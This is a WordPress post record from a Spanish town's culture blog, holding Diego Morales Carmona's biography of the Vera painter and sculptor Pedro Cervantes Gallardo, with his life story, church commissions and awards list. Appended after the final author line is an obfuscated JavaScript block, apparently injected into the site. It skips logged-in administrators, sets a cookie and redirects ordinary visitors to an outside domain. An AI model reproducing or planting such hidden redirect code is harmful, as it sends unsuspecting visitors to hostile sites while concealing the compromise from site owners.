{"id":3864,"date":"2018-12-07T12:17:43","date_gmt":"2018-12-07T12:17:43","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=3864"},"modified":"2018-12-07T12:22:02","modified_gmt":"2018-12-07T12:22:02","slug":"biografia-de-d-pedro-cervantes-gallardo-artista-pintor-y-escultor","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2018\/12\/07\/biografia-de-d-pedro-cervantes-gallardo-artista-pintor-y-escultor\/","title":{"rendered":"BIOGRAF\u00cdA DE D. PEDRO CERVANTES GALLARDO, ARTISTA, PINTOR Y ESCULTOR"},"content":{"rendered":"<p>D. Diego Morales Carmona publica la biograf\u00eda de D. Pedro Cervantes Gallardo, artista, pintor y escultor veratense.<\/p>\n<p><!--more--><\/p>\n<p style=\"text-align: right\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/11\/diego-morales-carmona.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-medium wp-image-3837\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/11\/diego-morales-carmona-250x300.jpg\" alt=\"\" width=\"250\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/11\/diego-morales-carmona-250x300.jpg 250w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/11\/diego-morales-carmona.jpg 425w\" sizes=\"(max-width: 250px) 100vw, 250px\" \/><\/a><\/p>\n<p style=\"text-align: right\">Autor: Diego Morales Carmona<\/p>\n<p>A lo largo de mi vida, tras muchas conversaciones con mi querido padre, D. Pedro Morales Cervantes, muchas cosas fueron las que me cont\u00f3 y, grabadas en mi mente, permanecen imborrables en el recuerdo de lo que para m\u00ed todo esto supuso. Su condici\u00f3n de hombre, amigo de sus amigos, concibi\u00f3 siempre el concepto de la amistad -as\u00ed lo interpretaba yo como gran admirador suyo por cuanto me dec\u00eda- desde el punto de vista filos\u00f3fico, como una virtud predominada por el afecto y la confianza.<br \/>\nPues bien, tras esas conversaciones diarias y casi siempre nocturnas, de \u00edndole varia y sobre todo, sobre personajes de Vera, sirva como ejemplo una que hac\u00eda referencia a un gran amigo suyo: D. PEDRO CERVANTES GALLARDO. Tal fue mi inter\u00e9s por el referido personaje que indagu\u00e9 en el prolijo y vasto estudio de su biograf\u00eda que, ahora, para conocimiento de los lectores, publico:<\/p>\n<p><strong>BIOGRAF\u00cdA DE D. PEDRO CERVANTES GALLARDO, ARTISTA PINTOR Y ESCULTOR<\/strong><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/15-autorretrato.jpg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-3882\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/15-autorretrato-300x293.jpg\" alt=\"\" width=\"300\" height=\"293\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/15-autorretrato-300x293.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/15-autorretrato.jpg 750w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><br \/>\nSeg\u00fan me narraba mi padre, su amigo era hombre de car\u00e1cter bromista, bohemio y veratense de pura cepa. Mi padre era cuatro a\u00f1os mayor que \u00e9l. Pues D. Pedro Cervantes Gallardo naci\u00f3 en el a\u00f1o 1924. Amigos en la infancia y juventud, acontecimientos y vicisitudes me cont\u00f3 mi padre de \u00e9l tras su estancia en Vera y, despu\u00e9s, tras conversaciones mutuas, sus venidas una vez ausentado de su Vera querida.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/13.jpg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-3880\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/13-300x242.jpg\" alt=\"\" width=\"300\" height=\"242\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/13-300x242.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/13.jpg 750w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><br \/>\nMe dijo que su procedencia era de familia humilde, residiendo junto a sus padres y hermana y que, desde muy joven, sin apenas recursos, y de manera totalmente autodidacta, se dedic\u00f3 a pintar a l\u00e1piz, a plumilla o a pincel sus obras.<br \/>\nMi padre, tras su ausencia, perdi\u00f3 toda clase de relaci\u00f3n con \u00e9l; pero yo, despierta mi curiosidad, quise investigar la trayectoria de este polifac\u00e9tico artista y tras petici\u00f3n a sus familiares transcribo lo que pude conseguir sobre el devenir de su existencia:<br \/>\n\u201cDesde muy joven incorpor\u00f3 a su trabajo como incipiente artista el color mediante pinturas elaboradas con diferentes pinturas de zapatos. M\u00e1s tarde fue el \u00f3leo utilizado para plasmar sus obras. La escultura, en menor medida, tambi\u00e9n form\u00f3 parte de su obra.<br \/>\nTras nuestra contienda civil, le fueron encargados diversos retratos por parte de personas influyentes (pol\u00edticos, militares, arist\u00f3cratas) de aquella \u00e9poca.<br \/>\nMarch\u00f3 a Madrid durante varios meses, formando parte de reuniones de j\u00f3venes pintores y tomando contacto con artistas consolidados del momento. En esta etapa hizo amistad con el pintor-arque\u00f3logo director del Museo de Arqueolog\u00eda de Almer\u00eda, D. Juan Cuadrado Ruiz, quien le aconsej\u00f3 sobre su futuro art\u00edstico. Asimismo, recibi\u00f3 ayuda de D. Diego Contreras, mecenas de j\u00f3venes promesas art\u00edsticas de la \u00e9poca.<br \/>\nCon posterioridad marcha a Barcelona, donde residi\u00f3 junto a su esposa, D\u00aa Remedios Caparr\u00f3s, tambi\u00e9n veratense como \u00e9l, y sus tres hijas.<br \/>\nA lo largo de toda su existencia, D. Pedro Cervantes Gallardo, crea una enorme obra pict\u00f3rica basada en el impresionismo, que es reconocida por multitud de seguidores incondicionales que nunca dudaron en promocionar, admirar y adquirir sus obras, saliendo algunas de ellas al extranjero. De igual forma, particip\u00f3 en Exposiciones de Arte, tanto individuales como colectivas, mostrando sus obras a plumilla y \u00f3leo, sin descartar sus aportaciones gr\u00e1ficas en diversos Programas de Fiestas con dibujos, bien fueran a plumilla o a color.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/14.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3881\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/14-300x245.jpg\" alt=\"\" width=\"300\" height=\"245\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/14-300x245.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/14.jpg 726w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><br \/>\nAsimismo, fue el encargado de realizar innumerables pinturas y frescos para Iglesias, tanto en obra original como restaurando obras antiguas como el retablo de la iglesia de San Jos\u00e9 (Los Gallardos, Almer\u00eda), retablo de diversa \u00edndole para la Iglesia de Vera, su ciudad natal, as\u00ed como \u00f3leos para diversas \u00f3rdenes religiosas, como Las Hermanitas de Ancianos Desamparados de Oviedo, destacando en este \u00e1mbito art\u00edstico el \u00f3leo de \u201cJes\u00fas predicando a orillas del lago\u201d en la Iglesia de San Joaqu\u00edn de Garrucha(Almer\u00eda). http:\/\/capilladelmar.blogspot.com.es\/search\/labelPedroCervantes.<br \/>\nM\u00e1s tarde, durante a\u00f1os, particip\u00f3 en la Exposici\u00f3n de Pintura del Hospital Sant Joan de D\u00e9u de Barcelona.<br \/>\nEn sus lienzos plasm\u00f3 bodegones, V\u00edrgenes, retratos, autorretratos, paisajes, sobre todo, de pueblos blancos: Menorca, Moj\u00e1car, Cadaqu\u00e9s\u2026<br \/>\nEntre sus premios destacan: Premio de Pintura Poble Espanyol, Barcelona, 1968.<br \/>\nPrimer premio talla en madera por su trabajo \u201cBusto\u201d, Exposici\u00f3n Provincial de Cultura y Arte.<br \/>\nPremio Pintura Exposici\u00f3n ARTE H. O. 1970.<br \/>\nPremio Pintura les Corts Barcelona. 1971.<br \/>\nO.S. Educaci\u00f3n y Descanso XXV Exp. Prov. PINTURA 1974.<br \/>\nH.O.S. A IV Bienal de Arte 1976<br \/>\nIII Certamen de Pintura Excmo. Ayuntamiento de VERA, 1977.<br \/>\nPremio Pintura Excmo. Ayuntamiento de Vera, 1979.<br \/>\nVI Bienal de Arte Hispano Olivetti, 1980.<br \/>\nPremio Concurso Pintura CIUDAD DE VERA. Excmo. Ayuntamiento, 1981.<br \/>\nPremio Pintura y Bienal Martorell, Barcelona, 1990.<br \/>\nHomenaje-Exposici\u00f3n en Convento de la Victoria de VERA del 2 al 15 de enero, 2015.<br \/>\nQuienes tuvieron el honor de conocerlo, cual es el caso de mi padre y amigos coet\u00e1neos, dicen que recordar\u00e1n por siempre el realismo de su obra, la pulcritud y firmeza de su trazo, el color, la luz conseguida en sus telas y, sobre todo, sus dos grandes pasiones: su amor a la familia y su hobby preferido: la pintura. Falleci\u00f3 el d\u00eda 6 de diciembre de 2009.\u201d<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/16.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3883\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/16-213x300.jpg\" alt=\"\" width=\"213\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/16-213x300.jpg 213w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/16.jpg 712w\" sizes=\"(max-width: 213px) 100vw, 213px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/12.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3879\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/12-229x300.jpg\" alt=\"\" width=\"229\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/12-229x300.jpg 229w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/12.jpg 745w\" sizes=\"(max-width: 229px) 100vw, 229px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/11.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3878\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/11-300x242.jpg\" alt=\"\" width=\"300\" height=\"242\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/11-300x242.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/11.jpg 750w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/10.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3877\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/10-255x300.jpg\" alt=\"\" width=\"255\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/10-255x300.jpg 255w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/10.jpg 750w\" sizes=\"(max-width: 255px) 100vw, 255px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/9.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3876\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/9-247x300.jpg\" alt=\"\" width=\"247\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/9-247x300.jpg 247w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/9.jpg 743w\" sizes=\"(max-width: 247px) 100vw, 247px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/8.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3875\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/8-246x300.jpg\" alt=\"\" width=\"246\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/8-246x300.jpg 246w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/8.jpg 722w\" sizes=\"(max-width: 246px) 100vw, 246px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/7.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3874\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/7-228x300.jpg\" alt=\"\" width=\"228\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/7-228x300.jpg 228w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/7.jpg 750w\" sizes=\"(max-width: 228px) 100vw, 228px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/6.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3873\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/6-300x224.jpg\" alt=\"\" width=\"300\" height=\"224\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/6-300x224.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/6.jpg 750w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/5.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3872\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/5-300x250.jpg\" alt=\"\" width=\"300\" height=\"250\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/5-300x250.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/5.jpg 741w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/4.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3871\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/4-300x249.jpg\" alt=\"\" width=\"300\" height=\"249\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/4-300x249.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/4.jpg 750w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/3.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3870\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/3-188x300.jpg\" alt=\"\" width=\"188\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/3-188x300.jpg 188w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/3-641x1024.jpg 641w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/3.jpg 709w\" sizes=\"(max-width: 188px) 100vw, 188px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/2.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3869\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/2-300x247.jpg\" alt=\"\" width=\"300\" height=\"247\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/2-300x247.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/2.jpg 735w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/1.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3868\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/1-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/1-300x225.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/12\/1.jpg 750w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><br \/>\nAutor: Diego Morales Carmona<script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>D. Diego Morales Carmona publica la biograf\u00eda de D. Pedro Cervantes Gallardo, artista, pintor y escultor veratense.<\/p>\n","protected":false},"author":7,"featured_media":3882,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[110],"tags":[82,304,17],"class_list":["post-3864","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-arte-artesania","tag-diego-morales-carmona","tag-pedro-cervantes-gallardo","tag-personajes-historicos"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/3864","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=3864"}],"version-history":[{"count":4,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/3864\/revisions"}],"predecessor-version":[{"id":3884,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/3864\/revisions\/3884"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/3882"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=3864"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=3864"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=3864"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}